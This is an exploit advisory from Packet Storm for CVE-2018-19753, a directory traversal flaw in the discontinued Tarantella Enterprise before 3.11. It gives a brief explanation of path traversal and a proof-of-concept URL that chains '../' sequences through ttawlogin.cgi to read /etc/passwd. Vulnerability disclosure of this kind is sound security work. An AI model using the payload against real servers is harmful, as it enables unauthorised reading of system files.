Lucene search

K
packetstormRafael PedreroPACKETSTORM:150541
HistoryNov 30, 2018 - 12:00 a.m.

Tarantella Enterprise Directory Traversal

2018-11-3000:00:00
Rafael Pedrero
packetstormsecurity.com
27

EPSS

0.007

Percentile

79.7%

`Vulnerability found in 2009.  
  
<!--  
# Exploit Title: Directory Traversal in Tarantella Enterprise before 3.11  
# Date: 30-11-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: Homepage: http://www.sun.com/ & http://www.oracle.com/  
# Software Link: the product is discontinued (vulnerability found in 2009)  
# Version: Tarantella Enterprise before 3.11  
# Tested on: All  
# CVE : CVE-2018-19753  
# Category: webapps  
  
  
1. Description  
  
Tarantella Enterprise before 3.11 allows Directory Traversal via a full  
pathname preceded by the ./ sequence, as demonstrated by a  
"/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=./" substring.  
  
A path traversal attack (also known as directory traversal) aims to access  
files and directories that are stored outside the web root folder. By  
manipulating variables that reference files with "dot-dot-slash (../)"  
sequences and its variations or by using absolute file paths, it may be  
possible to access arbitrary files and directories stored on file system  
including application source code or configuration and critical system  
files. It should be noted that access to files is limited by system  
operational access control (such as in the case of locked or in-use files  
on the Microsoft Windows operating system). The cgi ttawlogin.cgi can read  
files if use "./" in the petition.  
  
  
2. Proof of Concept  
  
http://x.x.x.x/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=./fileexist  
or (./../../../../../../../../../../../../../../etc/passwd)  
  
3. Solution:  
  
The product is discontinued.  
https://www.oracle.com/us/assets/lifetime-support-hardware-301321.pdf  
  
-->  
  
  
`

EPSS

0.007

Percentile

79.7%

Related for PACKETSTORM:150541